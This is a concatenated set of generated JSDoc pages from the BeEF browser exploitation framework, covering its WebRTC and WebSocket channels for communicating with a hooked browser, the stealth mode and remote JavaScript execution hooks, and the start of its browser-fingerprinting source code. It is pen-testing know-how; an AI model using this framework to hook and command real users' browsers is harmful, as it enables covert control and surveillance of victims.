<h4 class="name" id="createPeerConnection"><span class="type-signature">(static) </span>Beefwebrtc#createPeerConnection<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Try and establish the RTC connection</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="webrtc.js.html">webrtc.js</a>, <a href="webrtc.js.html#line136">line 136</a>
</li></ul></dd>
</dl>
<h4 class="name" id="doAnswer"><span class="type-signature">(static) </span>Beefwebrtc#doAnswer<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>As part of the processSignalingMessage function, we check for 'offers' from peers. If there's an offer, we answer, as below</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="webrtc.js.html">webrtc.js</a>, <a href="webrtc.js.html#line621">line 621</a>
</li></ul></dd>
</dl>
<h4 class="name" id="doCall"><span class="type-signature">(static) </span>Beefwebrtc#doCall<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>RTC - create an offer - the caller runs this, while the receiver runs calleeStart()</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="webrtc.js.html">webrtc.js</a>, <a href="webrtc.js.html#line460">line 460</a>
</li></ul></dd>
</dl>
<h4 class="name" id="execCmd"><span class="type-signature">(static) </span>Beefwebrtc#execCmd<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>How the browser executes received JS (this is pretty hacky)</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="webrtc.js.html">webrtc.js</a>, <a href="webrtc.js.html#line415">line 415</a>
</li></ul></dd>
</dl>
<h4 class="name" id="forceTurn"><span class="type-signature">(static) </span>Beefwebrtc#forceTurn<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Forces the TURN configuration (we can't query that computeengine thing because it's CORS is restrictive)
These values are now simply passed in from the config.yaml for the webrtc extension</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="webrtc.js.html">webrtc.js</a>, <a href="webrtc.js.html#line119">line 119</a>
</li></ul></dd>
</dl>
<h4 class="name" id="goStealth"><span class="type-signature">(static) </span>Beefwebrtc#goStealth<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>This is the function when a peer tells us to go into stealth by sending a dataChannel message of "!gostealth"</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="webrtc.js.html">webrtc.js</a>, <a href="webrtc.js.html#line314">line 314</a>
</li></ul></dd>
</dl>
<h4 class="name" id="iceCandidateType"><span class="type-signature">(static) </span>Beefwebrtc#iceCandidateType<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Helper method to determine what kind of ICE Candidate we've received</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="webrtc.js.html">webrtc.js</a>, <a href="webrtc.js.html#line630">line 630</a>
</li></ul></dd>
</dl>
<h4 class="name" id="initialize"><span class="type-signature">(static) </span>Beefwebrtc#initialize<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Initialize the object</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="webrtc.js.html">webrtc.js</a>, <a href="webrtc.js.html#line86">line 86</a>
</li></ul></dd>
</dl>
<h4 class="name" id="maybeStart"><span class="type-signature">(static) </span>Beefwebrtc#maybeStart<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Try and initiate, will check that system hasn't started, and that signaling is ready, and that TURN servers are ready</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="webrtc.js.html">webrtc.js</a>, <a href="webrtc.js.html#line434">line 434</a>
</li></ul></dd>
</dl>
<h4 class="name" id="mergeConstraints"><span class="type-signature">(static) </span>Beefwebrtc#mergeConstraints<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Helper method to merge SDP constraints</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="webrtc.js.html">webrtc.js</a>, <a href="webrtc.js.html#line472">line 472</a>
</li></ul></dd>
</dl>
<h4 class="name" id="noteIceCandidate"><span class="type-signature">(static) </span>Beefwebrtc#noteIceCandidate<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Used to record ICS candidates locally</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="webrtc.js.html">webrtc.js</a>, <a href="webrtc.js.html#line245">line 245</a>
</li></ul></dd>
</dl>
<h4 class="name" id="onAddIceCandidateError"><span class="type-signature">(static) </span>Beefwebrtc#onAddIceCandidateError<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Event handler for unsuccessful addition of ICE Candidates</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="webrtc.js.html">webrtc.js</a>, <a href="webrtc.js.html#line652">line 652</a>
</li></ul></dd>
</dl>
<h4 class="name" id="onAddIceCandidateSuccess"><span class="type-signature">(static) </span>Beefwebrtc#onAddIceCandidateSuccess<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Event handler for successful addition of ICE Candidates</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="webrtc.js.html">webrtc.js</a>, <a href="webrtc.js.html#line644">line 644</a>
</li></ul></dd>
</dl>
<h4 class="name" id="onCreateSessionDescriptionError"><span class="type-signature">(static) </span>Beefwebrtc#onCreateSessionDescriptionError<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>If the browser can't build an SDP</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="webrtc.js.html">webrtc.js</a>, <a href="webrtc.js.html#line513">line 513</a>
</li></ul></dd>
</dl>
<h4 class="name" id="onDataChannel"><span class="type-signature">(static) </span>Beefwebrtc#onDataChannel<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>When a data channel has been established - within here is the message handling function as well</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="webrtc.js.html">webrtc.js</a>, <a href="webrtc.js.html#line345">line 345</a>
</li></ul></dd>
</dl>
<h4 class="name" id="onIceCandidate"><span class="type-signature">(static) </span>Beefwebrtc#onIceCandidate<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>When the PeerConnection receives a new ICE Candidate</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="webrtc.js.html">webrtc.js</a>, <a href="webrtc.js.html#line165">line 165</a>
</li></ul></dd>
</dl>
<h4 class="name" id="onIceConnectionStateChanged"><span class="type-signature">(static) </span>Beefwebrtc#onIceConnectionStateChanged<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>When the ICE Connection State changes - this is useful to determine connection statuses with peers.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="webrtc.js.html">webrtc.js</a>, <a href="webrtc.js.html#line265">line 265</a>
</li></ul></dd>
</dl>
<h4 class="name" id="onRemoteHangup"><span class="type-signature">(static) </span>Beefwebrtc#onRemoteHangup<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>If a peer hangs up (we bring down the peerconncetion via the stop() method)</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="webrtc.js.html">webrtc.js</a>, <a href="webrtc.js.html#line660">line 660</a>
</li></ul></dd>
</dl>
<h4 class="name" id="onSetRemoteDescriptionSuccess"><span class="type-signature">(static) </span>Beefwebrtc#onSetRemoteDescriptionSuccess<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>If the browser successfully sets a remote description</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="webrtc.js.html">webrtc.js</a>, <a href="webrtc.js.html#line521">line 521</a>
</li></ul></dd>
</dl>
<h4 class="name" id="onSignalingStateChanged"><span class="type-signature">(static) </span>Beefwebrtc#onSignalingStateChanged<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>When the signalling state changes. We don't actually do anything with this except log it.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="webrtc.js.html">webrtc.js</a>, <a href="webrtc.js.html#line257">line 257</a>
</li></ul></dd>
</dl>
<h4 class="name" id="processMessage"><span class="type-signature">(static) </span>Beefwebrtc#processMessage<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>For all rtc signalling messages we receive as part of hook.js polling - we have to process them with this function
This will either add messages to the msgQueue and try and kick off maybeStart - or it'll call processSignalingMessage
against the message directly</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="webrtc.js.html">webrtc.js</a>, <a href="webrtc.js.html#line196">line 196</a>
</li></ul></dd>
</dl>
<h4 class="name" id="processSignalingMessage"><span class="type-signature">(static) </span>Beefwebrtc#processSignalingMessage<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Process messages, this is how we handle the signaling messages, such as candidate info, offers, answers</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="webrtc.js.html">webrtc.js</a>, <a href="webrtc.js.html#line540">line 540</a>
</li></ul></dd>
</dl>
<h4 class="name" id="sendPeerMsg"><span class="type-signature">(static) </span>Beefwebrtc#sendPeerMsg<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Shortcut function to SEND a data messsage</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="webrtc.js.html">webrtc.js</a>, <a href="webrtc.js.html#line425">line 425</a>
</li></ul></dd>
</dl>
<h4 class="name" id="sendSignalMsg"><span class="type-signature">(static) </span>Beefwebrtc#sendSignalMsg<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Send a signalling message ..</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="webrtc.js.html">webrtc.js</a>, <a href="webrtc.js.html#line235">line 235</a>
</li></ul></dd>
</dl>
<h4 class="name" id="setRemote"><span class="type-signature">(static) </span>Beefwebrtc#setRemote<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Used to set the RTC remote session</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="webrtc.js.html">webrtc.js</a>, <a href="webrtc.js.html#line612">line 612</a>
</li></ul></dd>
</dl>
<h4 class="name" id="stop"><span class="type-signature">(static) </span>Beefwebrtc#stop<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Bring down the peer connection</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="webrtc.js.html">webrtc.js</a>, <a href="webrtc.js.html#line671">line 671</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".rtcpollPeer"><span class="type-signature">(static) </span>rtcpollPeer<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>This is the actual poller when in stealth, it is global as well because we're using the setTimeout to execute it</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="webrtc.js.html">webrtc.js</a>, <a href="webrtc.js.html#line327">line 327</a>
</li></ul></dd>
</dl>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/beef.websocket.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: websocket</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: websocket</h1>
<section>
<header>
<h2>websocket</h2>
</header>
<article>
<div class="container-overview">
<div class="description"><p>Manage the WebSocket communication channel.
This channel is much faster and responsive, and it's used automatically
if the browser supports WebSockets AND beef.http.websocket.enable = true.</p></div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="websocket.js.html">websocket.js</a>, <a href="websocket.js.html#line8">line 8</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".alive"><span class="type-signature">(static) </span>alive<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Polling mechanism, to notify the BeEF server that the browser is still hooked,
and the WebSocket channel still alive.
todo: there is probably a more efficient way to do this. Double-check WebSocket API.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="websocket.js.html">websocket.js</a>, <a href="websocket.js.html#line86">line 86</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".init"><span class="type-signature">(static) </span>init<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Initialize the WebSocket client object.
Note: use WebSocketSecure only if the hooked origin is under https.
Mixed-content in WS is quite different from a non-WS context.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="websocket.js.html">websocket.js</a>, <a href="websocket.js.html#line26">line 26</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".send"><span class="type-signature">(static) </span>send<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Send data back to BeEF. This is basically the same as beef.net.send,
but doesn't queue commands.
Example usage:
beef.websocket.send('{"handler" : "' + handler + '", "cid" :"' + cid +
'", "result":"' + beef.encode.base64.encode(beef.encode.json.stringify(results)) +
'","callback": "' + callback + '","bh":"' + beef.session.get_hook_session_id() + '" }');</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="websocket.js.html">websocket.js</a>, <a href="websocket.js.html#line75">line 75</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".start"><span class="type-signature">(static) </span>start<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Send Helo message to the BeEF server and start async polling.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="websocket.js.html">websocket.js</a>, <a href="websocket.js.html#line48">line 48</a>
</li></ul></dd>
</dl>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/BeefJS.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: BeefJS</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: BeefJS</h1>
<section>
<header>
<h2>BeefJS</h2>
</header>
<article>
<div class="container-overview">
<div class="description"><p>Register the BeEF JS on the window object.</p></div>
<h5 class="subsection-title">Properties:</h5>
<table class="props">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>version</code></td>
<td class="type">
<span class="param-type">string</span>
</td>
<td class="description last"><p>BeEf Version</p></td>
</tr>
<tr>
<td class="name"><code>pageIsLoaded</code></td>
<td class="type">
<span class="param-type">boolean</span>
</td>
<td class="description last"><p>This gets set to true during window.onload(). It's a useful hack when messing with document.write().</p></td>
</tr>
<tr>
<td class="name"><code>onpopstate</code></td>
<td class="type">
<span class="param-type">array</span>
</td>
<td class="description last"><p>An array containing functions to be executed by the window.onpopstate() method.</p></td>
</tr>
<tr>
<td class="name"><code>onclose</code></td>
<td class="type">
<span class="param-type">array</span>
</td>
<td class="description last"><p>An array containing functions to be executed by the window.onclose() method.</p></td>
</tr>
<tr>
<td class="name"><code>commands</code></td>
<td class="type">
<span class="param-type">array</span>
</td>
<td class="description last"><p>An array containing functions to be executed by Beef.</p></td>
</tr>
<tr>
<td class="name"><code>components</code></td>
<td class="type">
<span class="param-type">array</span>
</td>
<td class="description last"><p>An array containing all the BeEF JS components.</p></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="beef.js.html">beef.js</a>, <a href="beef.js.html#line16">line 16</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".debug"><span class="type-signature">(static) </span>debug<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Adds a function to display debug messages (wraps console.log())</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="beef.js.html">beef.js</a>, <a href="beef.js.html#line40">line 40</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".execute"><span class="type-signature">(static) </span>execute<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Adds a function to execute.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="beef.js.html">beef.js</a>, <a href="beef.js.html#line62">line 62</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".regCmp"><span class="type-signature">(static) </span>regCmp<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Registers a component in BeEF JS.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="beef.js.html">beef.js</a>, <a href="beef.js.html#line77">line 77</a>
</li></ul></dd>
</dl>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/browser.js.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: browser.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: browser.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2023 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* Basic browser functions.
* @namespace beef.browser
*/
beef.browser = {
/**
* Returns the user agent that the browser is claiming to be.
* @example: beef.browser.getBrowserReportedName()
*/
getBrowserReportedName: function () {
return navigator.userAgent;
},
/**
* Returns the underlying layout engine in use by the browser.
* @example: beef.browser.getBrowserEngine()
*/
getBrowserEngine: function() {
try {
var engine = platform.layout;
if (!!engine)
return engine;
} catch (e) {}
return 'unknown';
},
/**
* Returns true if Avant Browser.
* @example: beef.browser.isA()
*/
isA: function () {
return window.navigator.userAgent.match(/Avant TriCore/) != null;
},
/**
* Returns true if Iceweasel.
* @example: beef.browser.isIceweasel()
*/
isIceweasel: function () {
return window.navigator.userAgent.match(/Iceweasel\/\d+\.\d/) != null;
},
/**
* Returns true if Midori.
* @example: beef.browser.isMidori()
*/
isMidori: function () {
return window.navigator.userAgent.match(/Midori\/\d+\.\d/) != null;
},
/**
* Returns true if Odyssey
* @example: beef.browser.isOdyssey()
*/
isOdyssey: function () {
return (window.navigator.userAgent.match(/Odyssey Web Browser/) != null && window.navigator.userAgent.match(/OWB\/\d+\.\d/) != null);
},
/**
* Returns true if Brave
* @example: beef.browser.isBrave()
*/
isBrave: function(){
return (window.navigator.userAgent.match(/brave\/\d+\.\d/) != null && window.navigator.userAgent.match(/Brave\/\d+\.\d/) != null);
},
/**
* Returns true if IE6.
* @example: beef.browser.isIE6()
*/
isIE6: function () {
return !window.XMLHttpRequest && !window.globalStorage;
},
/**
* Returns true if IE7.
* @example: beef.browser.isIE7()
*/
isIE7: function () {
return !!window.XMLHttpRequest && !window.chrome && !window.opera && !window.getComputedStyle && !window.globalStorage && !document.documentMode;
},
/**
* Returns true if IE8.
* @example: beef.browser.isIE8()
*/
isIE8: function () {
return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !window.performance;
},
/**
* Returns true if IE9.
* @example: beef.browser.isIE9()
*/
isIE9: function () {
return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !!window.performance && typeof navigator.msMaxTouchPoints === "undefined";
},
/**
*
* Returns true if IE10.
* @example: beef.browser.isIE10()
*/
isIE10: function () {
return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !window.XDomainRequest && !!window.performance && typeof navigator.msMaxTouchPoints !== "undefined";
},
/**
*
* Returns true if IE11.
* @example: beef.browser.isIE11()
*/
isIE11: function () {
return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.performance && typeof navigator.msMaxTouchPoints !== "undefined" && typeof document.selection === "undefined" && typeof document.createStyleSheet === "undefined" && typeof window.createPopup === "undefined" && typeof window.XDomainRequest === "undefined";
},
/**
*
* Returns true if Edge.
* @example: beef.browser.isEdge()
*/
isEdge: function () {
return !beef.browser.isIE() && !!window.StyleMedia;
},
/**
* Returns true if IE.
* @example: beef.browser.isIE()
*/
isIE: function () {
return this.isIE6() || this.isIE7() || this.isIE8() || this.isIE9() || this.isIE10() || this.isIE11();
},
/**
* Returns true if FF2.
* @example: beef.browser.isFF2()
*/
isFF2: function () {
return !!window.globalStorage && !window.postMessage;
},
/**
* Returns true if FF3.
* @example: beef.browser.isFF3()
*/
isFF3: function () {
return !!window.globalStorage && !!window.postMessage && !JSON.parse;
},
/**
* Returns true if FF3.5.
* @example: beef.browser.isFF3_5()
*/
isFF3_5: function () {
return !!window.globalStorage && !!JSON.parse && !window.FileReader;
},
/**
* Returns true if FF3.6.
* @example: beef.browser.isFF3_6()
*/
isFF3_6: function () {
return !!window.globalStorage && !!window.FileReader && !window.multitouchData && !window.history.replaceState;
},
/**
* Returns true if FF4.
* @example: beef.browser.isFF4()
*/
isFF4: function () {
return !!window.globalStorage && !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/4\./) != null;
},
/**
* Returns true if FF5.
* @example: beef.browser.isFF5()
*/
isFF5: function () {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/5\./) != null;
},
/**
* Returns true if FF6.
* @example: beef.browser.isFF6()
*/
isFF6: function () {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/6\./) != null;
},
/**
* Returns true if FF7.
* @example: beef.browser.isFF7()
*/
isFF7: function () {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/7\./) != null;
},
/**
* Returns true if FF8.
* @example: beef.browser.isFF8()
*/
isFF8: function () {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/8\./) != null;
},
/**
* Returns true if FF9.
* @example: beef.browser.isFF9()
*/
isFF9: function () {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/9\./) != null;
},
/**
* Returns true if FF10.
* @example: beef.browser.isFF10()
*/
isFF10: function () {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/10\./) != null;
},
/**
* Returns true if FF11.
* @example: beef.browser.isFF11()
*/
isFF11: function () {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/11\./) != null;
},
/**
* Returns true if FF12
* @example: beef.browser.isFF12()
*/
isFF12: function () {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/12\./) != null;
},
/**
* Returns true if FF13
* @example: beef.browser.isFF13()
*/
isFF13: function () {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/13\./) != null;
},
/**
* Returns true if FF14
* @example: beef.browser.isFF14()
*/
isFF14: function () {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/14\./) != null;
},
/**
